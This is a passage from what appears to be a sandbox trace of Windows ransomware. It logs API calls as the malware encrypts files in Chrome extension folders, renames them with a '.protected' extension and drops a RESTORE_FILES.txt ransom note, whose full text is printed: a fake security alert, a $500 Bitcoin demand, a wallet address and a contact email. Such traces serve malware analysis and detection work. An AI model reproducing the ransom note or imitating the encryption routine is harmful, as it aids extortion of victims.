(lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.696] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.696] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.696] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.696] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.696] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.697] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.697] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json") returned 145 [0079.697] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0079.697] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d8, lpOverlapped=0x0) returned 1 [0079.698] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.698] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d8, lpOverlapped=0x0) returned 1 [0079.698] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.698] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.699] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.699] CloseHandle (hObject=0x160) returned 1 [0079.699] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected") returned 155 [0079.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.protected")) returned 1 [0079.699] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.699] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.699] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales") returned 140 [0079.699] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.699] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.699] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*") returned 142 [0079.699] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.701] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\.") returned 142 [0079.701] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.701] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\..") returned 143 [0079.701] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.701] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.701] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0079.701] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0079.701] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar") returned 143 [0079.701] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0079.701] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0079.701] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*") returned 145 [0079.701] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.702] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.702] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\.") returned 145 [0079.702] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.702] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.702] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\..") returned 146 [0079.702] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.702] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.702] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.702] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.702] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.702] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.702] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.702] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.702] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json") returned 157 [0079.703] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.703] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.703] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.703] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.704] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.704] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.704] CloseHandle (hObject=0x168) returned 1 [0079.704] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected") returned 167 [0079.704] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.protected")) returned 1 [0079.705] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.705] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.705] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\RESTORE_FILES.txt") returned 161 [0079.705] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.705] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.705] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.706] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.706] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.706] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.706] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.706] CloseHandle (hObject=0x164) returned 1 [0079.706] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Windows") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Program Files") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="Program Files (x86)") returned -1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="$Recycle.bin") returned 1 [0079.706] lstrcmpiW (lpString1="bg", lpString2="System Volume Information") returned -1 [0079.706] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg") returned 143 [0079.706] lstrcmpW (lpString1="bg", lpString2=".") returned 1 [0079.706] lstrcmpW (lpString1="bg", lpString2="..") returned 1 [0079.706] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*") returned 145 [0079.706] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.707] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.707] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.707] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.707] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\.") returned 145 [0079.707] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.707] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.707] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.708] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.708] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.708] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\..") returned 146 [0079.708] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.708] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.708] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.708] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.708] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json") returned 157 [0079.708] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.708] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.708] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.708] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 